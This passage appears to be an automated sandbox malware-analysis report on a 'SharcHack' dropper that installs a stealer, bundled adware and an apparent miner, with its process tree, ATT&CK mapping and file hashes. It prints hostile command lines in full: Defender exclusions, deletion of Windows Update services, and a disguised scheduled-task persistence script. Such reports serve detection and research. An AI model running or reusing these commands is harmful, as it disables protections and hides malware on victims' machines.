cmd.exe 112 PID 1900 wrote to memory of 4992 1900 cmd.exe 113 PID 1900 wrote to memory of 4992 1900 cmd.exe 113 PID 2264 wrote to memory of 2000 2264 powershell.exe 117 PID 2264 wrote to memory of 2000 2264 powershell.exe 117 PID 2696 wrote to memory of 216 2696 cmd.exe 125 PID 2696 wrote to memory of 216 2696 cmd.exe 125 PID 4772 wrote to memory of 1304 4772 cmd.exe 126 PID 4772 wrote to memory of 1304 4772 cmd.exe 126 PID 4772 wrote to memory of 828 4772 cmd.exe 127 PID 4772 wrote to memory of 828 4772 cmd.exe 127 PID 2696 wrote to memory of 4452 2696 cmd.exe 128 PID 2696 wrote to memory of 4452 2696 cmd.exe 128 PID 2696 wrote to memory of 2408 2696 cmd.exe 129 PID 2696 wrote to memory of 2408 2696 cmd.exe 129 PID 4772 wrote to memory of 4768 4772 cmd.exe 130 PID 4772 wrote to memory of 4768 4772 cmd.exe 130 PID 2696 wrote to memory of 3724 2696 cmd.exe 131 PID 2696 wrote to memory of 3724 2696 cmd.exe 131 PID 4772 wrote to memory of 2644 4772 cmd.exe 133 PID 4772 wrote to memory of 2644 4772 cmd.exe 133 PID 2696 wrote to memory of 4708 2696 cmd.exe 134 PID 2696 wrote to memory of 4708 2696 cmd.exe 134 PID 2696 wrote to memory of 4528 2696 cmd.exe 135 PID 2696 wrote to memory of 4528 2696 cmd.exe 135 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3588
-
C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4804
-
-
C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Users\Admin\AppData\Local\Temp\v2.exe"C:\Users\Admin\AppData\Local\Temp\v2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
-
C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Users\Admin\AppData\Local\Temp\is-FO6LJ.tmp\CheatEngine75.tmp"C:\Users\Admin\AppData\Local\Temp\is-FO6LJ.tmp\CheatEngine75.tmp" /SL5="$6025A,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod0_extract\saBSI.exe"C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod0_extract\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:5040 -
C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod0_extract\installer.exe"C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod0_extract\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2708 -
C:\Program Files\McAfee\Temp3733020042\installer.exe"C:\Program Files\McAfee\Temp3733020042\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
PID:4060
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod1_extract\OperaSetup.exe"C:\Users\Admin\AppData\Local\Temp\is-9C7P3.tmp\prod1_extract\OperaSetup.exe" --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a --server-tracking-blob=NDg5MmM0M2NiZmYxOTc2MjY3ZDE3MGIyMzA3NGYyODVjNDZhOGNmNjg5YTA1ZDg5NTRhNThiN2MxZWIzZDk4OTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInRpbWVzdGFtcCI6IjE3MzUwMzgwMTIuNzc0NSIsInVzZXJhZ2VudCI6InB5dGhvbi1yZXF1ZXN0cy8yLjMyLjMiLCJ1dG0iOnt9LCJ1dWlkIjoiYWFmNjZmNDQtNWMyYy00ZmJmLTg0YmQtN2Y2OTE0MGY0MGRiIn0=6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2252 -
C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x330,0x334,0x338,0x32c,0x33c,0x717f9d44,0x717f9d50,0x717f9d5c7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1528
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3232
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2252 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241228211952" --session-guid=daf4266e-715b-4322-ae1e-6ec5e620655b --server-tracking-blob="NGEwNTZiMGVmZmM1MmRlYjUzNmQyNjkwMGU1OTc5ODUyN2U4ZjAwYTBlNDQ0NTQ4ZTA2NDk3ODQ2MmNmNjI5NTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTczNTAzODAxMi43NzQ1IiwidXNlcmFnZW50IjoicHl0aG9uLXJlcXVlc3RzLzIuMzIuMyIsInV0bSI6eyJjYW1wYWlnbiI6Im9wZXJhX25ld19hIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiYWlzIn0sInV1aWQiOiJhYWY2NmY0NC01YzJjLTRmYmYtODRiZC03ZjY5MTQwZjQwZGIifQ== " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=E0050000000000007⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:968 -
C:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS4C127778\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x31c,0x320,0x324,0x2f8,0x328,0x70779d44,0x70779d50,0x70779d5c8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2476
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5320
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\assistant_installer.exe" --version7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5288 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282119521\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=114.0.5282.21 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7117a0,0x7117ac,0x7117b88⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4920
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2100
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2216
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1280
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4592
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:2180
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:3608
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:3320
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3564
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:5088
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4992
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:4836 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4532
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4716
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#tugby#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2000
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4724
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:216
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:4452
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2408
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3724
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4708
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4528
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1204
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:528
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2256
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:1304
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:828
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
PID:4768
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
PID:2644
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ubulqosn2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4636
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:4916
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵PID:5000
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
PID:4164
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe vgyegivgfazcjxdl 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/zRLKpUXs5FnM1Cz+lDKtsCEDVmxImOWutHy/wWAAF6uYRISXHrJSUiB0oBkYNVSVc+Z5TfdaGGtLWt9rhn1IwMTF8FurdYcS6sHeOOKov7n8fO9XzXfUsz+ohQT/DgIOyRpUwzATAbwxDv0BlAH+ISI2MOv7cXgWh/hEHn9UpTLH2AUxVXP8zWMLLWvPHAJe2SIfhjGncq3xQ+gVn+I4NKh77PPjDPgwHNzByaS5XiUtDR8Md5EhmkOEwD9v8Eh4nbJIewLTK837YGsKnb02yQo3e+jdFtCWzMfMeobPaXFvrKzv2emNNnxavmVO2FkfkcC1DvbnhN7NqgiVLh1FnuRerr7Rs9GSm8wk3eogEBuxtyJF/l7QvFFEn+PmzyQ6wNeX5T4KpCB8N2LdQ7qGf0xREtOLrL2we+R3IiFUCw/PgUnlB9aOUvPUntLmUYwnVg3n39kwuMDyHF7sntpqwSQW5ruNhQsPrhI9EqpLJ48=2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2100
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3028 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4816
-
-
C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe"C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4332 -
C:\Program Files\McAfee\WebAdvisor\UIHost.exe"C:\Program Files\McAfee\WebAdvisor\UIHost.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6072
-
-
C:\Program Files\McAfee\WebAdvisor\updater.exe"C:\Program Files\McAfee\WebAdvisor\updater.exe"2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2272 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c IF EXIST "C:\Program Files\McAfee\WebAdvisor\Download" ( DEL "C:\Program Files\McAfee\WebAdvisor\Download\*.bak" )3⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c DEL "C:\Program Files\McAfee\WebAdvisor\*.tmp"3⤵PID:4268
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c dir "C:\Program Files (x86)\McAfee Security Scan" 2>nul2⤵PID:1404
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Component Object Model Hijacking
1Power Settings
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Component Object Model Hijacking
1Defense Evasion
Impair Defenses
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
1.8MB
MD5d879d97acf98b6ec553731a91d9fcd1c
SHA1b001ba483bdb22e75069be626946c9be06aea9f5
SHA256d5d6d579965cb2e231af81a2bf60a39a1955ec3782f27d9b1b8177f87b202c94
SHA5120514f7f80d7d2d05f949621b80166602096130db5f18c6099c35a0ee18df8eaaf056557f24de1d2b7c5c4817056b4cddda42231243fa35b64bd1853558fe4236
-
Filesize
49KB
MD5a15cf0e1fea6c857cd90a27073009053
SHA10c5735098a552ef00f0e3e406a0d8887f296c7b7
SHA25663b731a170f3eec34f4eedfc1727f9c6343c0ae2f981783873c638f9a8f16ebf
SHA512851765e13af4444af9ddecbf48e4d11a83b8e8494ce6795c97855a90f7f24163f6e4548c4fde451e45fc1b17bcc54618fcc780b9263d223961e02cab355e1d9c
-
Filesize
1.3MB
MD5f81cd9f1599139c5de0ccd3b13285927
SHA159e7c8cf872c2f781bb1dd8a735e5610535f4c43
SHA256808e5dfbaf55691037a992e719f1fbf5bf5fb40f8d6440d0706f27d4e7fb9ce2
SHA512167e42368002c5cf233d4f8a39c3e5fdf0ba952de024e1ae4951ad2c7f0e989ac615a0a57e006e653a77f971e73c708a8ef6e26c6049bd76096d28b764c4ccd6
-
Filesize
4.8MB
MD5afa82b1222d9a93ce2ec0279dc025671
SHA1c9297d806d299da095f9d1979db9c5b54baf237f
SHA256ffa9ce39c49a226732e75bc8b5558ffc9db3c12a7984ff4d99c9ce5e8bf214b6
SHA51265b63ad867f922f1053e51420b98b46bb6c5e05fd7a7e01e52f89914e206704d28facb8c426558290034a212e6ff4b75a68fce2e1e7d41a97539f96360f1ab5c
-
Filesize
2.9MB
MD59b6fdfbc11b51e810f01598730a002f4
SHA1e93bbc426be5ba4d4e9a8fe6c59404c9c693223f
SHA256c9e3ea8126273b9fa2439f674767f420630c46d68c02a9940ee97aad05c42872
SHA5129d6e8c635fabdf71e4e0eb694ced5348445b69f7db0f3de83348b441df2b4a24282c56c5e7ac1703060c5a106c28e9f06b71aabecd62dc67eff944b057b8da95
-
Filesize
263KB
MD54c8e546d932fc567fa9a68c82f938e6e
SHA1498a252c3b26a6f3ff91caba13ffebb31aeb0298
SHA256bc88ee7b453e250f66b4fbd42bfb76176ae98a30583742302d26477e3d422206
SHA512b94d33bd7e2d1601c2a707014454b15be8105c95460f9c78bee766a0415fa30b8fe63d2b179f906b5e5c9b0bd50e70e04eedbfcdfd1d1ca35dd1a8207c9e6860
-
Filesize
1.5MB
MD55cabc7883bb21c8bff60d53e0ea36bcc
SHA1f70d4b8cbe253a7b9ec24f3763ec6fa3878ebd6f
SHA256fdacd53dda248588c1c33bd9292727bb489c3607155ce27362cb814c13496e9b
SHA512009aeacaf6c57e533cccf37ba62f8188bf183efd6b57676a4731a001f1aa8ab657c731f0bb339d5a50ead8d2194ef4048cd64a573be03e230da55bea5098aa6f
-
Filesize
53KB
MD5947535d9d40c5d9449ecd7d013dcaf9d
SHA1b3334ce8b2a03a390e4a8ace1050909d2ab720d2
SHA256f7b7cae20366ebecea2c85fdbc4414d68825351ea1863f60884cc0fb37301e87
SHA512cee30131d4a15ecf63b305480fd989e0b07d3bb82d25ab42d5ab408574dee1237247a506d813432c4dabbf27629a8edbb6433b68ce841a657ad6ecc21b77494b
-
Filesize
20KB
MD51bf5917726859d01723b7c7d0c8e3401
SHA1983057a862d666936d66c869acfbd36bd834381f
SHA256fa356d5e1e483a5529b38a7af7ba9d4e334a04154c2e4fa9da77b1173cd238e5
SHA512e8d9f74bc23f2625bbcbedcbfff2e2c613edd83670e8c59069f3c790da1004eb24aea9148acbe3bfddd881466caf587634219287d2c8f4a60c6bbb41bd30d44d
-
Filesize
22KB
MD5e7d9075ee9b4a0ddd5e37997fed5ba32
SHA13aa715350f76b7751625121d80c5df61625435ea
SHA25664af2d604765b508c310e44477543954f797cd876813d1aedfc1308980d651ad
SHA512586fd1ec9509206f970440b94c3ec6d7ac1a11937b6a1749d0475812473eed79ed283d3bd977073274bd02d30703a002cfe0d12d69d293f61f6ef24c82829e21
-
Filesize
770KB
MD5dda2017cc752902d620249ed1a22b205
SHA1327e24cf04b28c5eaf3db9f2e05eb2ab9fbb8dd3
SHA256c0b41a04e5fa665c31fb12be474ddad97ee2f470c3cc5633c517adab50bf3cae
SHA512cdc2226d7a12d536aff17cee663b11625a2c21997bc22e5270f1d996c284d6d94d7f7a2766672dbd7c60eb494acc487eefa5868cee8b3e51782fc2bc89fab865
-
Filesize
302KB
MD5e47efbaa8572c26c8040aae2738b246f
SHA14ddb1af4a2019bb459c0e71cbf493a4263fe08ca
